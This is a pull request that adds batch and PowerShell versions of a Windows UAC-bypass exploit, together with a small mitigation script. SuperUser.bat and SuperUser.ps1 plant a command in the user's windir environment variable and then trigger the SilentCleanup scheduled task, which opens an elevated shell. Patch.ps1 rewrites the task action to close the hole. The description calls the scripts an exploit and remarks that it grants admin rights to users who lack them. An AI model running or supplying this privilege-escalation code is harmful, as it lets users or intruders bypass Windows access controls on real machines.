### PR TITLE
Add CMD and Powershell versions and a patch

### DIFF
--- a/Patch.ps1
+++ b/Patch.ps1
@@ -1,0 +1,2 @@
+$action = New-ScheduledTaskAction -Execute $env:windir\System32\cleanmgr.exe -Argument "/autoclean /d $env:systemdrive"
+Set-ScheduledTask -TaskName SilentCleanup -TaskPath \Microsoft\Windows\DiskCleanup\ -action $action

--- a/SuperUser.bat
+++ b/SuperUser.bat
@@ -1,0 +1,4 @@
+@echo off
+reg add HKCU\Environment /t REG_SZ /v windir /d "c:\windows\..\windows\system32\cmd.exe /c \"cd %HOMEPATH% ^&^& C:\windows\system32\cmd.exe\";c:\windows" /f
+schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+reg add HKCU\Environment /t REG_SZ /v windir /d "C:\WINDOWS" /f

--- a/SuperUser.ps1
+++ b/SuperUser.ps1
@@ -1,0 +1,3 @@
+$null = New-ItemProperty 'HKCU:\Environment' -Name 'windir' -Value 'c:\windows\..\windows\system32\cmd.exe /c "cd %HOMEPATH% && C:\windows\system32\cmd.exe";c:\windows' -PropertyType String -Force;
+$null = schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I;
+$null = New-ItemProperty 'HKCU:\Environment' -Name 'windir' -Value 'C:\WINDOWS' -PropertyType String -Force;


### PR DESCRIPTION
Hi!

I personally find the CMD and Powershell versions of the exploit easier to read. I share them because maybe they'll be of some use to someone.

I also wrote a simple Powershell script that patches the exploit by replacing the environment variables in the task's action by their values, hence making the script injection impossible. The script should be executed as admin, which is easy to do with the exploit even if you normally do not have the rights.